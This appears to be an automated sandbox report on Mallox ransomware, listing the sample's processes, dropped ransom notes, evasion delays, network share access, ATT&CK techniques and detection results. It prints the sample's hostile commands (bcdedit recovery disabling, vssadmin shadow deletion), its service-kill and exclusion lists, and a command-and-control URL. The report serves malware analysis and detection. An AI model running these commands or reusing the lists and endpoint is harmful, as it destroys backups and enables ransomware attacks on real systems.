      Source: C:\Users\user\Desktop\Ransomware Mallox.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
      Source: Ransomware Mallox.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: Ransomware Mallox.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Ransomware Mallox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: Ransomware Mallox.exe, 00000000.00000003.1689061261.0000023CAFFE6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb source: Ransomware Mallox.exe, 00000000.00000003.1688757795.0000023CAFFE6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\HOW TO BACK FILES.txtxt source: Ransomware Mallox.exe, 00000000.00000003.1696834790.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1699524403.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1692939049.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1700357889.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp
      Source: Ransomware Mallox.exeStatic PE information: section name: _RDATA

      Persistence and Installation Behavior

      barindex
      Uses bcdedit to modify the Windows boot settings
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} recoveryenabled no
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} recoveryenabled no
      Source: Ransomware Mallox.exeBinary or memory string: \sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exeAES-128-ECBAES-192-ECBAES-256-ECBAES-128-CBCAES-192-CBCAES-256-CBCAES-128-CFB128AES-192-CFB128AES-256-CFB128AES-128-OFBAES-192-OFBAES-256-OFBAES-128-CTRAES-192-CTRAES-256-CTRAES-128-XTSAES-256-XTSAES-128-GCMAES-192-GCMAES-256-GCMAES-128-CCMAES-192-CCMAES-256-CCMAES-128-CCM*-NO-TAGAES-192-CCM*-NO-TAGAES-256-CCM*-NO-TAGCAMELLIA-128-ECBCAMELLIA-192-ECBCAMELLIA-256-ECBCAMELLIA-128-CBCCAMELLIA-192-CBCCAMELLIA-256-CBCCAMELLIA-128-CFB128CAMELLIA-192-CFB128CAMELLIA-256-CFB128CAMELLIA-128-CTRCAMELLIA-192-CTRCAMELLIA-256-CTRCAMELLIA-128-GCMCAMELLIA-192-GCMCAMELLIA-256-GCMCAMELLIA-128-CCMCAMELLIA-192-CCMCAMELLIA-256-CCMCAMELLIA-128-CCM*-NO-TAGCAMELLIA-192-CCM*-NO-TAGCAMELLIA-256-CCM*-NO-TAGARIA-128-ECBARIA-192-ECBARIA-256-ECBARIA-128-CBCARIA-192-CBCARIA-256-CBCARIA-128-CFB128ARIA-192-CFB128ARIA-256-CFB128ARIA-128-CTRARIA-192-CTRARIA-256-CTRARIA-128-GCMARIA-192-GCMARIA-256-GCMARIA-128-CCMARIA-192-CCMARIA-256-CCMARIA-128-CCM*-NO-TAGARIA-192-CCM*-NO-TAGARIA-256-CCM*-NO-TAGDES-ECBDES-CBCDES-EDE-ECBDES-EDE-CBCDES-EDE3-ECBDES-EDE3-CBCCHACHA20CHACHA20-POLY1305AES-128-KWAES-192-KWAES-256-KWAES-128-KWPAES-192-KWPAES-256-KWPMD5RIPEMD160SHA1SHA224SHA256SHA384SHA512
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\7-Zip\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessibility\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Java\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Maintenance\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office Tools\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\StartUp\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\System Tools\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Windows PowerShell\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Start Menu\HOW TO BACK FILES.txtJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Creates files in the recycle bin to hide itself
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1000\HOW TO BACK FILES.txtJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 180000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 7200000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 18000000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exe TID: 7988Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exe TID: 7988Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exe TID: 7988Thread sleep time: -1800000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exe TID: 7988Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exe TID: 7988Thread sleep time: -7200000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exe TID: 7988Thread sleep time: -18000000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 180000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 7200000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeThread delayed: delay time: 18000000Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DCJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\NULLJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\AcrobatJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdfJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\NULLJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\NULLJump to behavior
      Source: Ransomware Mallox.exe, 00000000.00000003.1382916081.0000023CADE9E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1381857687.0000023CADE99000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1382984420.0000023CADEA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Ransomware Mallox.exe, 00000000.00000003.1382916081.0000023CADE9E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1386247479.0000023CADE9E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1386396001.0000023CADEA3000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1381857687.0000023CADE99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: Ransomware Mallox.exeBinary or memory string: SeTakeOwnershipPrivilegeUnknown exceptionbad array new lengthmap/set too longmsocache$windows.~wssystem volume informationintelappdataperflogsprogramdatagoogleapplication datator browserboot$windows.~btmozillawindows.oldWindows Microsoft.NETWindowsPowerShellWindows NTWindowsCommon FilesMicrosoft Security ClientInternet ExplorerReferenceAssembliesWindows DefenderMicrosoft ASP.NETCore RuntimePackageStoreMicrosoft Help ViewerMicrosoft MPIWindows KitsMicrosoft.NETWindows MailPackage StoreMicrosoft Analysis ServicesWindows Portable DevicesWindows Photo ViewerWindows Sidebar.msstyles.icl.idx.avast.rtp.mallox.sys.nomedia.dll.hta.cur.lock.cpl.Globeimposter-Alpha865qqz.ics.hlp.com.spl.msi.key.mpa.rom.drv.bat.386.adv.diangcab.mod.scr.theme.ocx.prf.cab.diagcfg.msu.cmd.ico.msc.ani.icns.diagpkg.deskthemepack.wpx.msp.bin.themepack.shs.nls.exe.lnk.ps1.mallab.mdf.bak.smd.dbf.sqldesktop.inintuser.datthumbs.dbiconcache.dbntuser.inintldrbootfont.binntuser.dat.logbootsect.bakboot.iniautorun.infdebugLog.txtTargetInfo.txtsqlserv.exeoracle.exentdbsmgr.exesqlservr.exesqlwriter.exeMsDtsSrvr.exemsmdsrv.exeReportingServecesService.exefdhost.exefdlauncher.exemysql.exestring too long: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setSiebelApplicationContainer_Siebel_Home_d_Siebel_saiReportServer$SQLEXPRESSSQL Server Reporting ServicesSQL Server (MSSQLSERVER)MSSQLFDLauncherSQLSERVERAGENTSQLBrowserSQLTELEMETRYMsDtsServer130SSISTasdRY130MSSQL$WOLTERSKLUWERSQLAgent$PROGIDSQLWriterMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012MSSQLSQLAgentMSSQLServerADHelper100MSSQLServerOLAPServiceMsDtsServer100ReportServerSQLTELEMETRY$HLTMBMServerMSSQL$PROGIDXT800Service_PersonalAHS SERVICESense Shield ServiceFontCache3.0.0.0OSP ServiceDAService_TCPeCard-TTransServerwanxiao-monitorvm-agentSyncBASE ServiceFlash Helper ServiceKiwi Syslog ServerUWS HiPriv ServicesUWS LoPriv ServicesUtilDev Web Server ProZTE USBIP Client GuardZTE USBIP ClientZTE FileTranSZabbix AgentEasyFZS ServerRpc MonitorNuo Update MonitorDaemon ServiceFlexNet Licensing Service 64U8WorkerService2U8MPoolU8WebPoolU8WorkerService1TongBackupSrvcbVSCService11CobianBackup11MSSQLSERVERMSSQL$vssvmvssMSSQL$FE_EXPRESSSQLANYs_Sage_FAS_Fixed_AssetsMSSQL$VIM_SQLEXPQcSoftServiceVMToolsVGAuthServiceMSDTCTeamViewerRabbitMQSSMonitorServiceSSSyncServiceTPlusStdAppService1300MSSQL$SQL2008SQLAgent$SQL2008TPlusStdTaskService1300TPlusStdUpgradeService1300VirboxWebServerjhi_serviceLMSeCardMPServiceEnergyDataServiceUI0DetectK3MobileServiceTCPIDDAServiceWebAttendServerUIODetectVMAuthdServiceVMUSBArbServiceVMwareHostdVmAgentDaemonOpenSSHdeSightServiceapacheztJenkinssecbizsrvMSMQsmtpsvrJTzyb_sync360EntHttpServer360EntSvc360EntClientSvcNFWebServerwampapacheMSSEARCHmsftesqlOracleDBConcoleorclOracleJobSchedulerORCLOracleMTSRecoveryServiceOracleOraDb11g_home1ClrAgentOracleOraDb11g_home1TNSListenerOracleVssWriterORCLOracleServiceORCLaspnet_stateRedisJhTaskImeDictUpdateServiceMCServiceallpass_redisservice_port21160ftnlsv3ftnl
      Source: Ransomware Mallox.exe, 00000000.00000003.1485865185.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1452671327.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546376683.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1517525405.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1510500234.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.2036263949.0000023CAFF08000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537835548.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1558677864.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1460079520.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1557947339.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Ransomware Mallox.exe, 00000000.00000003.1548754782.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1458753914.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1522348603.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1436895176.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1525525503.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1452833747.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1515736964.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1484167282.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1438864827.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1531120213.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
      Source: Ransomware Mallox.exe, 00000000.00000003.1382916081.0000023CADE9E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1386247479.0000023CADE9E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1381857687.0000023CADE99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization ServiceY;
      Source: Ransomware Mallox.exe, 00000000.00000003.1395311869.0000023CADE9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
      Source: Ransomware Mallox.exe, 00000000.00000003.1382916081.0000023CADE9E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1381857687.0000023CADE99000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1382984420.0000023CADEA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Ransomware Mallox.exe, 00000000.00000003.1521311504.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1517078018.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1512198939.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1530759812.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1522852934.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1494233966.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1514282847.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1509849904.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1553035779.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1489751960.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: Ransomware Mallox.exe, 00000000.00000003.1382916081.0000023CADE9E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1381857687.0000023CADE99000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1382984420.0000023CADEA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Ransomware Mallox.exe, 00000000.00000003.1431702725.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1435423549.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1433442938.0000023CADEF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Ransomware Mallox.exe, 00000000.00000003.1996953236.0000023CAFF51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vMcIY
      Source: bcdedit.exe, 00000007.00000002.1385583946.0000018937458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pEFI VMware Virtual SATA CDROM Drive (0.0)
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} recoveryenabled no
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO BACK FILES.txt VolumeInformation

      Stealing of Sensitive Information

      barindex
      Opens network shares
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\224.0.0.22\admin$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\224.0.0.22\admin$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\224.0.0.22\c$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\224.0.0.22\c$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\192.168.2.1\admin$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\192.168.2.1\admin$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\192.168.2.1\c$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: \\192.168.2.1\c$\ozon.exeJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeDirectory queried: C:\Documents and SettingsJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeDirectory queried: C:\Documents and SettingsJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeDirectory queried: number of queries: 1001

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Replication Through Removable Media      		Windows Management Instrumentation1
      Registry Run Keys / Startup Folder      		11
      Process Injection      		1
      Masquerading      		11
      Input Capture      		1
      Network Share Discovery      		Remote Services11
      Input Capture      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      Data Encrypted for Impact
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Bootkit      		1
      Registry Run Keys / Startup Folder      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Security Software Discovery      		Remote Desktop Protocol1
      Data from Local System      		4
      Non-Application Layer Protocol      		Exfiltration Over Bluetooth1
      Inhibit System Recovery
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories      		NTDS21
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Bootkit      		LSA Secrets11
      Peripheral Device Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials1
      System Network Configuration Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      File Deletion      		DCSync22
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
      System Information Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549252 Sample: Ransomware Mallox.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 36 api.ipify.org 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 10 other signatures 2->50 8 Ransomware Mallox.exe 3 1028 2->8         started        13 notepad.exe 2->13         started        signatures3 process4 dnsIp5 38 91.215.85.142, 49781, 49788, 49802 PINDC-ASRU Russian Federation 8->38 40 192.168.2.1, 135, 274 unknown unknown 8->40 42 3 other IPs or domains 8->42 28 C:\Users\user\...\wallet-pre-stable.json, DOS 8->28 dropped 30 C:\Users\user\AppData\Local\...\strings.json, DOS 8->30 dropped 32 Microsoft.Lync.Uti...s.zip.mallab (copy), COM 8->32 dropped 34 356 other files (354 malicious) 8->34 dropped 52 Creates files in the recycle bin to hide itself 8->52 54 Deletes shadow drive data (may be related to ransomware) 8->54 56 Uses bcdedit to modify the Windows boot settings 8->56 58 Opens network shares 8->58 15 cmd.exe 8->15         started        18 cmd.exe 8->18         started        file6 signatures7 process8 signatures9 60 Uses bcdedit to modify the Windows boot settings 15->60 20 conhost.exe 15->20         started        22 bcdedit.exe 15->22         started        24 conhost.exe 18->24         started        26 bcdedit.exe 18->26         started        process10

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Ransomware Mallox.exe82%ReversingLabsWin64.Ransomware.Mallox
      Ransomware Mallox.exe100%AviraHEUR/AGEN.1319014
      Ransomware Mallox.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://91.215.85.142/QWEwqdsvsf/ap.phpwshqos.dll70%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.phpyxZ0%Avira URL Cloudsafe
      http://api.ipify.orga0%Avira URL Cloudsafe
